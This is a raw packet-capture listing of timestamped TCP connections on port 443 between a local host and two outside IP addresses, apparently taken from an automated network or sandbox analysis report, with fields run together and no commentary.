                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.378752947 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379106045 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379168034 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379173040 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379268885 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379357100 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379359007 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379412889 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379504919 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379511118 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379638910 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379687071 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379774094 CEST49861443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.379782915 CEST44349861104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.383409023 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.396083117 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.396361113 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.396377087 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.396876097 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.397424936 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.397515059 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.397577047 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.407594919 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.407639980 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.407902002 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.408117056 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.408135891 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.415652990 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.439441919 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.443094015 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.443188906 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.443263054 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.444878101 CEST49863443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.444925070 CEST44349863104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.452713966 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.452775955 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.452863932 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.453161955 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.453181028 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.485898972 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.485996962 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.486088037 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.489126921 CEST49864443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.489160061 CEST44349864104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.528443098 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.548032999 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.548059940 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.549221039 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.549755096 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.549927950 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.550014019 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.550185919 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.550200939 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.550283909 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.551064014 CEST49859443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.551105022 CEST4434985979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.556902885 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.556998014 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.557058096 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.557168961 CEST49860443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.557212114 CEST4434986079.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.560816050 CEST49868443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.560848951 CEST4434986879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.560940027 CEST49868443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.561163902 CEST49868443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.561177015 CEST4434986879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.595411062 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.707232952 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.707326889 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.707443953 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.713742971 CEST49862443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.713772058 CEST4434986279.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.830383062 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.830574989 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.830637932 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.840523958 CEST49869443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.840570927 CEST4434986979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.840641022 CEST49869443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.840895891 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.840904951 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.840992928 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.841598988 CEST49869443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.841629028 CEST4434986979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.841819048 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.841841936 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.841842890 CEST49865443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.841867924 CEST4434986579.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.874396086 CEST49871443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.874422073 CEST4434987179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.874489069 CEST49871443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.874702930 CEST49871443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.874718904 CEST4434987179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.890460014 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.890683889 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.890696049 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.891124964 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.891506910 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.891583920 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.891752958 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.933208942 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.934216976 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.934246063 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.934695005 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.935138941 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.935218096 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.935298920 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.935430050 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:29.975423098 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.065640926 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.065730095 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.065850019 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.079157114 CEST49866443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.079166889 CEST44349866104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.080822945 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.080971956 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.081063032 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.251502037 CEST49872443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.251537085 CEST44349872104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.251696110 CEST49872443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.252819061 CEST49872443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.252834082 CEST44349872104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.253324986 CEST49867443192.168.2.4104.18.95.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.253357887 CEST44349867104.18.95.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.267868996 CEST4434986879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.268137932 CEST49868443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.268152952 CEST4434986879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.269275904 CEST4434986879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.269717932 CEST49868443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.269840002 CEST49868443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.269881010 CEST4434986879.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.320399046 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.321974039 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.321995020 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.323123932 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.323657990 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.323739052 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.323925018 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.371412992 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.374366045 CEST49868443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463542938 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463738918 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463815928 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463901997 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463912010 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463938951 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463985920 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.463994026 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.464037895 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.464056969 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.464209080 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.464282036 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.464287043 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.468159914 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.468244076 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.468266964 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.468280077 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.468337059 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.533180952 CEST4434986979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.542109966 CEST49869443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.542140961 CEST4434986979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.542617083 CEST4434986979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.543046951 CEST49869443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.543118954 CEST4434986979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.543297052 CEST49869443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553530931 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553611994 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553662062 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553673029 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553774118 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553812981 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553817987 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553867102 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553894997 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553932905 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553937912 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.553976059 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.554569006 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.554649115 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.554693937 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.554724932 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.554750919 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.554764986 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.554790974 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555510044 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555578947 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555593967 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555607080 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555638075 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555666924 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555684090 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555705070 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.555727005 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556479931 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556535006 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556546926 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556598902 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556632996 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556648016 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556667089 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.556709051 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.565892935 CEST4434987179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.587395906 CEST4434986979.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644293070 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644385099 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644428015 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644460917 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644495964 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644535065 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644644976 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644722939 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644771099 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644771099 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.644804955 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645232916 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645412922 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645467997 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645483971 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645562887 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645622015 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645634890 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645657063 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645706892 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.645719051 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.646330118 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.646404982 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.646416903 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.646454096 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.646511078 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.646522045 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.646574974 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.647288084 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.647360086 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.647438049 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.647497892 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.647532940 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.647588968 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648328066 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648425102 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648426056 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648454905 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648492098 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648540974 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648602009 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.648612976 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.651300907 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.674108982 CEST49871443192.168.2.479.137.248.152
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.674133062 CEST4434987179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.674810886 CEST4434987179.137.248.152192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.734886885 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.734962940 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735012054 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735107899 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735107899 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735109091 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735177994 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735271931 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735322952 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735340118 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735368967 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735419035 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735430956 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735534906 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735585928 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735598087 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735615969 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735645056 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735662937 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.735692024 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.736042976 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.736094952 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.736107111 CEST44349870104.18.94.41192.168.2.4
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.736155033 CEST49870443192.168.2.4104.18.94.41
                                                                                                                                                                                                                                Oct 3, 2024 22:57:30.736221075 CEST44349870104.18.94.41192.168.2.4
